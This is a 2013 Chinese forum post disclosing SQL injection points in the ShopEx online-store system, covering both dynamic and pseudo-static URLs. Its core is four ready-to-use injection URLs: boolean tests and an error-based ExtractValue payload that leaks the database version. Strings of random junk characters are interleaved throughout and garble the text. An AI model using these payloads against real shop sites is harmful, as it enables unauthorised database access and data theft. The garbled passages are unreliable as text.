注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…: f* f3 Q! b5 p, Q$ w
% M4 K1 S3 I6 I! [2 E; F( d好吧,我扯远了~~
. Q0 w8 L& g6 ?1 O7 x其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~: {4 K: g$ y8 C$ \6 L5 a
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:$ v! _4 h6 b3 I* l
4 P, |& A3 T8 I
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html G' \4 Y2 J3 T+ D+ |
/ }# c) X& ]# I8 \9 z+ @# t i% Ohttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
. i `& b9 i' d3 p. V% K4 E$ [$ ]
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
# a" T# @4 a$ _5 ]. Y, i F) g' p0 \0 Z
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
0 J; {$ P4 I5 Y' W! y" b- J" x6 I, h$ N2 _0 Y) t, t* F- v- t! K+ k
& K: Z. S+ Y; P* Z1 r: R" v$ m- w, h A一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。! h2 t' B4 b1 ]/ U# x
如何注入就不多说了,10多年的东西了…不会也会了…* y6 l( S* m( k9 `
5 n5 x0 [7 ^7 ^: I |
发表于 2013-2-4 16:20:04
收藏
支持
反对